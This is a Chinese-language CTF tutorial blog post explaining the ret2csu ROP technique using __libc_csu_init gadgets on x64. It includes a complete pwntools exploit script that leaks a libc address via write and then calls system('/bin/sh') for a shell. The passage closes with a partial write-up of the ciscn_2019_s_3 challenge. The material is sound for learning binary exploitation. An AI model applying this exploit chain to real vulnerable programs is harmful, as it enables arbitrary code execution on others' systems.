ret2csu 原创

ret2csu

个人见解

csu实际上是基于libc的一种泄露函数基地址的做法，其原理还是基于rop链的构造。大多时候我们难以找到每个寄存器对应的gadgets，但是当我们遇到wirte函数泄露的时候却必须要控制三个寄存器（64位首先存入数据的rdi，rsi，rdx），这时候，我们就可以利用 x64 下的 __libc_csu_init 中的 gadgets
这个函数是用来对libc进行初始化操作的，所以这个函数一般都会存在。而我们所利用的是函数的两块区域。

可以看到我们需要的三个寄存器分别被r14,r13,r12所赋值，而我们的gadget2可以操控这三个寄存器的值。那么我们的思路就很清晰了。

先通过gadget2修改寄存器值，返回到gadget把我们需要的寄存器值赋值，然后call write打印基地址，最后执行到gadget2

retn到我们需要溢出的函数地址。

exp：

from LibcSearcher import *
from pwn import *

io = process('64')
elf = ELF('./64')
context.arch = 'amd64'
context.log_level = 'debug'

padding = 0x8 + 8
write_plt = elf.plt['write']
write_got = elf.got['write']
gadget1 = 0x4011D8
gadget2 = 0x4011F2
rdi_ret = 0x4011fb
dofunc = elf.sym['dofunc']

payload = flat([b'a'*padding,gadget2,0,1,1,write_got,8,write_got,gadget1])
payload += p64(0xdeadbeef)*7
payload += p64(dofunc)

io.sendlineafter("input:",payload)

real_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

libc = LibcSearcher('write',real_addr)
libc_base = real_addr - libc.dump('write')
sys_addr = libc.dump('system') + libc_base
binsh = libc.dump('str_bin_sh') + libc_base
ret = 0x401016

payload2 = flat([b'a'*padding,ret,rdi_ret,binsh,sys_addr])
io.sendlineafter("input:",payload2)
io.interactive()

注：32位一般不会出现scu，因为其传参无需寄存器来存储，直接在栈上操作即可

接下来我以buu的ciscn_2019_s_3为例题来融汇贯通一下

Ciscn_s_3

题目概括：
此题涉及到了ret2sycall和寄存器修改（可以视为csu）

首先我们发现这是一个静态连接，所以不是普通的libc，需要我们自己去给buff里面写入/bin/sh\x00，并且找出buff的最低地址位置。这里需要使用gbd查看

aaaaaaaa的位置在0x7fffffffde60，而write能从地址0x7fffffffde60输出到地址0x7fffffffde80，这里边的内容，发现有疑似栈的数据0x00007fffffffdf78，所以有bin_sh_addr = 栈的基地址 - 0x118。那我们利用read向栈上写/bin/sh字符串，再用write进行泄露/bin/sh的地址。

也就是说，因为write打印的话，是先从栈的低地址打印，再打印高地址的内容，那么先打印0x20的数据，再打印0x8的数据就是栈的基地址，再减去0x118就获得 /bin/sh的地址

这样我们就成功写入了/bin/sh